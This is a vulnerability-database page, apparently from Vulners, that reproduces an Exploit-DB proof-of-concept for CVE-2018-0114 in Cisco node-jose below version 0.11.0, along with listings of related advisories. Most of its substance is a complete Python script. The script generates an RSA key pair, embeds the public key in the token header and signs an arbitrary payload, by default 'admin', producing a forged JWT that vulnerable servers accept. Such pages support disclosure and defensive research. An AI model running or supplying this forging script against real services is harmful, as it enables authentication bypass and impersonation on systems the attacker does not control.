Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco node-jos < 0.11.0 - Re-sign Tokens

🗓️ 20 Mar 2018 00:00:00Reported by zioBlackType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 56 Views

Generates a forged token with RSA signature using Cisco node-jose <0.11.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Cisco node-jos < 0.11.0 - Re-sign Tokens Exploit
20 Mar 201800:00
zdt
ATTACKERKB		CVE-2018-0114
4 Jan 201806:29
attackerkb
Circl		CVE-2018-0114
2 Aug 202310:00
circl
CNVD		Cisco node-jose open source library security bypass vulnerability
25 Dec 201700:00
cnvd
CVE		CVE-2018-0114
4 Jan 201806:00
cve
Cvelist		CVE-2018-0114
4 Jan 201806:00
cvelist
GithubExploit		jwt-attack-suite
14 Apr 202606:44
githubexploit
exploitpack		Cisco node-jos 0.11.0 - Re-sign Tokens
20 Mar 201800:00
exploitpack
Github Security Blog		Cisco node-jose improper validation of JWT signature
13 May 202201:17
github
NVD		CVE-2018-0114
4 Jan 201806:29
nvd
Rows per page
#!/usr/bin/env python3

import base64
from urllib.parse import quote_plus
import rsa
import sys

#zi0Black

'''
EDB Note: This has been updated ~ https://github.com/offensive-security/exploitdb/pull/139

POC of CVE-2018-0114 Cisco node-jose <0.11.0
Example: python3 44324.py "mypayload" 512

Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
Enhanced for python3 by github.com/eshaan7

Mail: [email protected]
Site: https://zioblack.xyz

A special thanks to Louis Nyffenegger, the founder of PentesterLab, for all the help he provided to allow me to write this script.

Mail: [email protected]
Site: https://pentesterlab.com

'''

def generate_key(key_size):
    #create rsa priv & public key
    print ("[+]Creating-RSA-pair-key")
    (public_key,private_key) = rsa.newkeys(key_size,poolsize=8)
    print ("\t[+]Pair-key-created")
    return private_key, public_key

def pack_bigint(i):
    b = bytearray()
    while i:
        b.append(i & 0xFF)
        i >>= 8
    return b[::-1]

def generate_header_payload(payload,pubkey):
    #create header and payload
    print ("[+]Assembling-the-header-and-the-payload")
    n=base64.urlsafe_b64encode(pack_bigint(pubkey.n)).decode('utf-8').rstrip('=')
    e=base64.urlsafe_b64encode(pack_bigint(pubkey.e)).decode('utf-8').rstrip('=')
    headerAndPayload = base64.b64encode(('{"alg":"RS256",'
                                        '"jwk":{"kty":"RSA",'
                                        '"kid":"[email protected]",'
                                        '"use":"sig",'
                                        '"n":"'+n+'",'
                                        '"e":"'+e+'"}}').encode())
    headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload)
    headerAndPayload = headerAndPayload
    print ("\t[+]Assembed")
    return headerAndPayload

def generate_signature(firstpart,privkey):
    #create signature
    signature = rsa.sign(firstpart,privkey,'SHA-256')
    signatureEnc = base64.b64encode(signature)
    print ("[+]Signature-created")
    return signatureEnc

def create_token(headerAndPayload,sign):
    print ("[+]Forging-of-the-token\n\n")
    token = (headerAndPayload+b"."+sign).decode('utf-8').rstrip('=')
    token = quote_plus(token)
    return token

if(len(sys.argv)>0):
    payload = bytes(str(sys.argv[1]).encode('ascii'))
    key_size = int(sys.argv[2])
else:
    payload = b'admin'
    key_size = int(512)


banner="""
   _____  __      __  ______            ___     ___    __    ___              ___    __   __   _  _
  / ____| \ \    / / |  ____|          |__ \   / _ \  /_ |  / _ \            / _ \  /_ | /_ | | || |
 | |       \ \  / /  | |__     ______     ) | | | | |  | | | (_) |  ______  | | | |  | |  | | | || |_
 | |        \ \/ /   |  __|   |______|   / /  | | | |  | |  > _ <  |______| | | | |  | |  | | |__   _|
 | |____     \  /    | |____            / /_  | |_| |  | | | (_) |          | |_| |  | |  | |    | |
  \_____|     \/     |______|          |____|  \___/   |_|  \___/            \___/   |_|  |_|    |_|    by @zi0Black
"""

if __name__ == '__main__':
    print (banner)
    (privatekey,publickey) = generate_key(key_size)
    firstPart = generate_header_payload(payload,publickey)
    signature = generate_signature(firstPart,privatekey)
    token = create_token(firstPart,signature)
    print(token)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Mar 2018 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25
CVSS 3.17.5
EPSS0.84691
SSVC
python3-script rsa-signature token-forging cisco-node-jose exploit-cve-2018-0114 csrf-vulnerability cisco-vulnerability-poc forged-token .
56